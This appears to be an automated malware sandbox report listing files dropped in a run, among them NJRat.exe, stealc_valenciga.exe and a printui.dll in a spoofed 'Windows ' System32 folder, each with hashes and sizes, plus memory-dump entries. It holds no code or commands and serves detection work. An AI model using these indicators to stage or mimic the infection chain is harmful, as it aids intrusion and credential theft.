Download Submit
C:\Users\Admin\AppData\Local\Temp\3232512144.exe

Filesize
79KB

MD5
0c883b1d66afce606d9830f48d69d74b

SHA1
fe431fe73a4749722496f19b3b3ca0b629b50131

SHA256
d921fc993574c8be76553bcf4296d2851e48ee39b958205e69bdfd7cf661d2b1

SHA512
c047452a23efad4262479fbfeb5e23f9497d7cefd4cbb58e869801206669c2a0759698c70d18050316798d5d939b989537fdce3842aa742449f5e08ed7fa60a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\CG70\CG70.exe

Filesize
3.1MB

MD5
c065c5d2355b43a34a41cefe85f65923

SHA1
9bf7e657cf1991e5c2f43d944e9d0c649f00cb1f

SHA256
81b314cafe59540df10a2c316f6ac3955661140da57b89b7777e09e0b2f18a59

SHA512
a361656ba9af3c726f5c944d4f5065c3d3ba248282191ceba1341957b828a86ef5917f5445c6142558cd4910e92d89d969094a3ceb7e1a9d404b403740e33e6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\CG70\Qt5SerialPort.dll

Filesize
59KB

MD5
cb55c4f6816042a9ab8d135fd492feb2

SHA1
d4d608526aea3919fbd13db7a91f310c0e33000a

SHA256
11baceb7cceab402954eacd688512e033e34c375ae8ae2fbf00904385d7bed09

SHA512
882624d8e91f6ef022343b0d2ad93881c8d5a1b7fc84c60ab9e2bb9f1291dd6b9d767c838fbaaf25d6699470faac5a6bacd19b1b1a7038a1df43938910559c98

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\7mpPLxE.exe

Filesize
426KB

MD5
82bb7a2c4d05216ec5fc07aa20324bc1

SHA1
3f652844912f6c134c656da0ef35750c267016dd

SHA256
56e333f04b51aa90a9d086eb855ac51b23c19170f7989f770f6a56383cffe8f2

SHA512
efc991b07660b93c2562c58c91bb4ce1f8f907848e3f2ac4c45c80016025148877cf25df336afd041106fa35376ffe2868695c92d2c6f81ae107d16c7cdf051a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\NJRat.exe

Filesize
31KB

MD5
29a37b6532a7acefa7580b826f23f6dd

SHA1
a0f4f3a1c5e159b6e2dadaa6615c5e4eb762479f

SHA256
7a84dd83f4f00cf0723b76a6a56587bdce6d57bd8024cc9c55565a442806cf69

SHA512
a54e2b097ffdaa51d49339bd7d15d6e8770b02603e3c864a13e5945322e28eb2eebc32680c6ddddbad1d9a3001aa02e944b6cef86d4a260db7e4b50f67ac9818

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Update.exe

Filesize
10.5MB

MD5
7bd4b2e7b8944e00e01a00eccbaa754d

SHA1
4801fcae5808cbab5ff0949ea3e775326b808ab7

SHA256
91100722706077cac27a4889f99cc5d75855d0f2dcc869692295a1c12f350a61

SHA512
681db5d19bafdd21b9a6f2e793fe466ce553a55bf87c8714bf504ea771a79a4942c5c77162d25a80b07389a84a526ab07bff6259e69d5fc9a9f479412351f22c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe

Filesize
600KB

MD5
f9830df1dfdb31cec5e3bd9f892edc9a

SHA1
073e56d2fbef94dd6fdfc1ff1fe12ecc71736029

SHA256
9c40291f6a315e70b45ad05f9671d7eea89ab14aecebf42ce9ba4c167509c9e5

SHA512
5cffa490084da873f341b4b88c3b92d9b25d1ba9e9a28e5d249037c2cb3fa27348d4f2eb770e274c3bab47c69eaf942f118c25eca47b6216cff3c492c815a885

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\feb9sxwk.exe

Filesize
1.6MB

MD5
d4e3a11d9468375f793c4c5c2504a374

SHA1
6dc95fc874fcadac1fc135fd521eddbdcb63b1c6

SHA256
0dc03de0ec34caca989f22de1ad61e7bd6bc1eabc6f993dbed2983f4cc33923d

SHA512
9d87f182f02daafad9b21f8a0f5a0eeedb277f60aa2d21bb8eb660945c153503db35821562f12b82a4e84cef848f1b1391c116ff30606cb495cf2e8ce4634217

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\libcurl.dll

Filesize
575KB

MD5
18ce47f58b4c1a9cfc1edf7c8bf49b7c

SHA1
e74d08ab06ed8200d7e674d8031d6df8250de8cb

SHA256
36d97f1c254832cee9698cea2f1a63ea98d231641fd29715ef581be103ace602

SHA512
19b2d6968095c4e8f08c66ab73e7ec5e0439712bcb2777266602ef2ad123a779395a3d44bc0c7c9945376998fb2165bc60e6bf682863a55a0cff40c720594bdd

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\major.exe

Filesize
1.6MB

MD5
fa3d03c319a7597712eeff1338dabf92

SHA1
f055ba8a644f68989edc21357c0b17fdf0ead77f

SHA256
a08db4c7b7bacc2bacd1e9a0ac7fbb91306bf83c279582f5ac3570a90e8b0f87

SHA512
80226bb11d56e4dc2dbc4fc6aade47db4ca4c539b25ee70b81465e984df0287d5efcadb6ec8bfc418228c61bd164447d62c4444030d31655aaeed342e2507ea1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\nano.exe

Filesize
552KB

MD5
1873f27a43f63c02800d6c80014c0235

SHA1
3441bba24453db09fb56e02a9d56cdf775886f07

SHA256
4bfcba248d79dfd6c2cba52d7c9ee18842f007bfa0e3ba99ababacb4794e8c6e

SHA512
9f2b663afc1cc3dbc8eba3278f61ffb41c19e42f94ee4c8a60eff83c8846b81d34e4ff869b643434a8ad5657c46bd06a712f0598062b62802ba6f0ee6f4fb8f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\needmoney.exe

Filesize
4.1MB

MD5
7fa5c660d124162c405984d14042506f

SHA1
69f0dff06ff1911b97a2a0aa4ca9046b722c6b2f

SHA256
fd3edfaff77dd969e3e0d086495e4c742d00e111df9f935ed61dfba8392584b2

SHA512
d50848adbfe75f509414acc97096dad191ae4cef54752bdddcb227ffc0f59bfd2770561e7b3c2a14f4a1423215f05847206ad5c242c7fd5b0655edf513b22f6c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\peinf.exe

Filesize
20KB

MD5
2473392c0a773aad20da1519aa6f464b

SHA1
2068ffd843bb8c7c7749193f6d1c5f0a9b97b280

SHA256
3d33e8778ea8194d486d42784411e8528c602594abdf3e32cdcee521a10f3ce7

SHA512
5455866f5fc53ae48ff24222b40a264bf673102435abeac2a61ba6fcaa1de429d8f078d4d065cb5d77b96de87f343579651b718e0a60934fb9fa35818d948074

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\pp.exe

Filesize
10KB

MD5
08dafe3bb2654c06ead4bb33fb793df8

SHA1
d1d93023f1085eed136c6d225d998abf2d5a5bf0

SHA256
fc16c0bf09002c93723b8ab13595db5845a50a1b6a133237ac2d148b0bb41700

SHA512
9cf2bd749a9ee6e093979bc0d3aacfba03ad6469c98ff3ef35ce5d1635a052e4068ac50431626f6ba8649361802f7fb2ffffb2b325e2795c54b7014180559c99

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\random.exe

Filesize
1.8MB

MD5
b58725b0a514974aae36a20730adc4b3

SHA1
a99eb4395fc9a95cad952a7d4bd444fb3baa9103

SHA256
a64238bb65c406ec9ef9267f96de8b2ff4a2dc1998859970f2b7399aed50db76

SHA512
21ed4926463abff571fa30161607cfc58ef2106683295830764a6008d9e6c1228271966c951c030b13db295217b7f568797ebf74fb02a4ed86d198a34d9b7a29

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\stealc_valenciga.exe

Filesize
187KB

MD5
cb24cc9c184d8416a66b78d9af3c06a2

SHA1
806e4c0fc582460e8db91587b39003988b8ff9f5

SHA256
53ebff6421eac84a4337bdf9f33d409ca84b5229ac9e001cd95b6878d8bdbeb6

SHA512
3f4feb4bbe98e17c74253c0fec6b8398075aecc4807a642d999effafc10043b3bcf79b1f7d43a33917f709e78349206f0b6f1530a46b7f833e815db13aeeb33a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\test9.exe

Filesize
354KB

MD5
d399231f6b43ac031fd73874d0d3ef4d

SHA1
161b0acb5306d6b96a0eac17ba3bedb8c4a1b0f2

SHA256
520db0cc6b1c86d163dff2797dcbc5f78b968313bedea85f7530830c87e0287f

SHA512
b1d0b94b0b5bc65113a196276d0a983872885c4b59dd3473bcaa6c60f2051de4579a7bc41082a2016472a3ec7de8bcf3ac446e3f3cb27521327fe166284d3400

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\w.exe

Filesize
47KB

MD5
d4826d365cf4dd98966196f868817394

SHA1
2d17bf67b0a179b2f32a3f6e57c960a9eae42be5

SHA256
2ab6b6abe9e3f1d24bf8606a675915e600413c8a9089de5ae3606b595a70aab5

SHA512
6269bd39c8682aa9e22422c162034de84cbf1d82ff46c25c7dd04a60759d88958b1ac7e4488f315b4e5e4a3b173af1132eedd741ce99265c6d1c4fab9f94d180

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\zlib1.dll

Filesize
88KB

MD5
f53d1efea4855da42da07de49d80ba68

SHA1
920349f4bd5a5b8e77195c81e261dfa2177eb1ee

SHA256
7e9f43688189578042d791e3e5301165316edc7c1ed739e0669c033a3ca08037

SHA512
5d72f64b8e5c42a3c9a7bcbbe8a1598a85402ade4f312ab9e26869f8b39952a3aa037f2cf7da89e686c5bc3fcb221feeae077b9ffd2eef98dac0e307637fe7bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c3ijfait.u3d.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost015.exe

Filesize
2.9MB

MD5
b826dd92d78ea2526e465a34324ebeea

SHA1
bf8a0093acfd2eb93c102e1a5745fb080575372e

SHA256
7824b50acdd144764dac7445a4067b35cf0fef619e451045ab6c1f54f5653a5b

SHA512
1ac4b731b9b31cabf3b1c43aee37206aee5326c8e786abe2ab38e031633b778f97f2d6545cf745c3066f3bd47b7aaf2ded2f9955475428100eaf271dd9aeef17

Download Submit
C:\Windows \System32\printui.dll

Filesize
16.6MB

MD5
d05265e842a7e119a89b84580c6fbea7

SHA1
d4c2eae71300e505c07bc7aaa7f836dbac9ee39a

SHA256
f9edeb80630d9b2d24d05da935377ac1a4dcc18b8ffc99de33d17cb9531db8af

SHA512
fc5886bb732523b5eddc503439ffc3915800fd254a6207dea014aa732a3d7d3105877214a2d5a6f257b0e76a1ef728b52599134c4de2228896dbce2351781c7e

Download Submit
C:\Windows \System32\printui.exe

Filesize
62KB

MD5
a5e526d6accb87538405012b7303036e

SHA1
23720547c84a5af74c29a8825ff83ff50997b615

SHA256
065df0995e7dcce6b51c8b9e53125086ab15598e0445722b3a94f1bbf1a654bf

SHA512
5855a8d8a73cc71be122efcb8ca69969ecae3977ef4c4e4afcf373aab1e0c49f61bcbf5a74b7b2d2d9e57160940df9f00bd3af40b8126771f5b34a7a2115b01e

Download Submit
C:\Windows\System32\svcldr64.dat

Filesize
16.6MB

MD5
9094c7cb12a45623615a5025196a3b9b

SHA1
710a478c06a1c0e009eb0710515ee0df7488da67

SHA256
f723808ad1e9218493c44567e81c5663a70a6164a68084a362b9fca68cb7c03c

SHA512
989263361c589edef62c6a24ddc4424997a3971a1447bd793e05a213445a16db24b88508ab6b7d42bc4c51f568de9aa0b857581c1cd5e0f2f8d701cf60590b86

Download Submit
memory/372-776-0x00000247D2FA0000-0x00000247D3162000-memory.dmp

Filesize
1.8MB

Download
memory/372-777-0x00000247D36A0000-0x00000247D3BC8000-memory.dmp

Filesize
5.2MB

Download
memory/868-593-0x0000000000F20000-0x00000000013EC000-memory.dmp

Filesize
4.8MB

Download
memory/868-778-0x0000000000F20000-0x00000000013EC000-memory.dmp

Filesize
4.8MB

Download
memory/868-816-0x0000000000F20000-0x00000000013EC000-memory.dmp

Filesize
4.8MB

Download
memory/1468-351-0x0000000000370000-0x00000000005B3000-memory.dmp

Filesize
2.3MB

Download
memory/1468-373-0x0000000061E00000-0x0000000061EF3000-memory.dmp

Filesize
972KB

Download
memory/1468-492-0x0000000000370000-0x00000000005B3000-memory.dmp

Filesize
2.3MB

Download
memory/1480-719-0x0000000000700000-0x00000000009FB000-memory.dmp

Filesize
3.0MB

Download
memory/1480-739-0x0000000000700000-0x00000000009FB000-memory.dmp

Filesize
3.0MB

Download
memory/1536-800-0x0000000074B30000-0x00000000752E0000-memory.dmp

Filesize
7.7MB

Download
memory/1536-2-0x0000000004BD0000-0x0000000004C6C000-memory.dmp

Filesize
624KB

Download
memory/1536-3-0x0000000074B30000-0x00000000752E0000-memory.dmp

Filesize
7.7MB

Download
memory/1536-0-0x0000000074B3E000-0x0000000074B3F000-memory.dmp

Filesize
4KB

Download
memory/1536-82-0x0000000074B30000-0x00000000752E0000-memory.dmp

Filesize
7.7MB

Download
memory/1536-1-0x0000000000390000-0x0000000000398000-memory.dmp

Filesize
32KB

Download
memory/1536-70-0x0000000074B3E000-0x0000000074B3F000-memory.dmp

Filesize
4KB

Download
memory/1700-230-0x0000000000770000-0x0000000000782000-memory.dmp

Filesize
72KB

Download
memory/1872-1063-0x0000021358F90000-0x0000021359045000-memory.dmp

Filesize
724KB

Download
memory/1940-518-0x0000000000400000-0x000000000081B000-memory.dmp

Filesize
4.1MB

Download
memory/2140-1083-0x00000122F84F0000-0x00000122F85A5000-memory.dmp

Filesize
724KB

Download
memory/2268-270-0x0000023630740000-0x0000023630762000-memory.dmp

Filesize
136KB

Download
memory/2728-630-0x0000000000C20000-0x0000000000E81000-memory.dmp

Filesize
2.4MB

Download
memory/2728-769-0x0000000000C20000-0x0000000000E81000-memory.dmp

Filesize
2.4MB

Download
memory/2732-218-0x0000000000B00000-0x0000000000FCC000-memory.dmp

Filesize
4.8MB

Download
memory/2732-174-0x0000000000B00000-0x0000000000FCC000-memory.dmp

Filesize
4.8MB

Download
memory/2760-208-0x0000000000F20000-0x00000000013EC000-memory.dmp

Filesize
4.8MB

Download
memory/2760-215-0x0000000000F20000-0x00000000013EC000-memory.dmp

Filesize
4.8MB

Download
memory/2904-806-0x0000000000400000-0x0000000000AD0000-memory.dmp

Filesize
6.8MB

Download
memory/2904-832-0x0000000000400000-0x0000000000AD0000-memory.dmp

Filesize
6.8MB

Download
memory/2996-58-0x0000000000400000-0x000000000045B000-memory.dmp

Filesize
364KB

Download
memory/2996-56-0x0000000000400000-0x000000000045B000-memory.dmp

Filesize
364KB

Download
memory/3300-705-0x0000000000400000-0x000000000045A000-memory.dmp

Filesize
360KB

Download
memory/3300-706-0x0000000000400000-0x000000000045A000-memory.dmp

Filesize
360KB

Download
memory/3428-183-0x00007FFFE5990000-0x00007FFFE6A3D000-memory.dmp

Filesize
16.7MB

Download
memory/3428-307-0x00007FFFE5990000-0x00007FFFE6A3D000-memory.dmp

Filesize
16.7MB

Download
memory/3428-244-0x00007FFFE5990000-0x00007FFFE6A3D000-memory.dmp

Filesize
16.7MB

Download
memory/3428-533-0x00007FFFE5990000-0x00007FFFE6A3D000-memory.dmp

Filesize
16.7MB

Download
memory/3428-418-0x00007FFFE5990000-0x00007FFFE6A3D000-memory.dmp

Filesize
16.7MB

Download
memory/3488-1040-0x0000018D69480000-0x0000018D69488000-memory.dmp

Filesize
32KB

Download
memory/3488-1038-0x0000018D69470000-0x0000018D6947A000-memory.dmp

Filesize
40KB

Download
memory/3488-1042-0x0000018D694C0000-0x0000018D694CA000-memory.dmp

Filesize
40KB

Download
memory/3488-1041-0x0000018D694B0000-0x0000018D694B6000-memory.dmp

Filesize
24KB

Download
memory/3488-1032-0x0000018D69260000-0x0000018D69315000-memory.dmp

Filesize
724KB

Download
memory/3488-1039-0x0000018D694D0000-0x0000018D694EA000-memory.dmp

Filesize
104KB

Download
memory/3488-1031-0x0000018D69240000-0x0000018D6925C000-memory.dmp

Filesize
112KB

Download
memory/3488-1033-0x0000018D69320000-0x0000018D6932A000-memory.dmp

Filesize
40KB

Download
memory/3488-1037-0x0000018D69490000-0x0000018D694AC000-memory.dmp

Filesize
112KB

Download
memory/4136-14-0x0000000000A30000-0x0000000000A33000-memory.dmp

Filesize
12KB

Download
memory/4136-12-0x0000000000A30000-0x0000000000A84000-memory.dmp

Filesize
336KB

Download
memory/4136-216-0x0000000000D00000-0x0000000000D61000-memory.dmp

Filesize
388KB

Download
memory/4136-104-0x0000000000400000-0x0000000000460000-memory.dmp

Filesize
384KB

Download
memory/4136-13-0x0000000000D00000-0x0000000000D61000-memory.dmp

Filesize
388KB

Download
memory/4328-84-0x00000157C1C50000-0x00000157C1C51000-memory.dmp

Filesize
4KB

Download
memory/4328-83-0x00000157C1C50000-0x00000157C1C51000-memory.dmp

Filesize
4KB

Download
memory/4328-95-0x00000157C1C50000-0x00000157C1C51000-memory.dmp

Filesize
4KB

Download
memory/4328-89-0x00000157C1C50000-0x00000157C1C51000-memory.dmp

Filesize
4KB

Download
memory/4328-90-0x00000157C1C50000-0x00000157C1C51000-memory.dmp

Filesize
4KB

Download
memory/4328-91-0x00000157C1C50000-0x00000157C1C51000-memory.dmp

Filesize
4KB

Download
memory/4328-94-0x00000157C1C50000-0x00000157C1C51000-memory.dmp

Filesize
4KB

Download
memory/4328-85-0x00000157C1C50000-0x00000157C1C51000-memory.dmp

Filesize
4KB

Download
memory/4328-92-0x00000157C1C50000-0x00000157C1C51000-memory.dmp

Filesize
4KB

Download
memory/4328-93-0x00000157C1C50000-0x00000157C1C51000-memory.dmp

Filesize
4KB

Download
memory/4784-678-0x0000000000400000-0x0000000000643000-memory.dmp

Filesize
2.3MB

Download
memory/4784-519-0x0000000000400000-0x0000000000643000-memory.dmp

Filesize
2.3MB

Download
memory/4784-511-0x0000000000400000-0x0000000000643000-memory.dmp

Filesize
2.3MB

Download
memory/4784-508-0x0000000000400000-0x0000000000643000-memory.dmp

Filesize
2.3MB

Download
memory/5116-1006-0x00007FF67A3A0000-0x00007FF67A7C8000-memory.dmp

Filesize
4.2MB

Download
memory/5116-729-0x00007FF67A3A0000-0x00007FF67A7C8000-memory.dmp

Filesize
4.2MB

Download
memory/5116-836-0x00007FF67A3A0000-0x00007FF67A7C8000-memory.dmp

Filesize
4.2MB

Download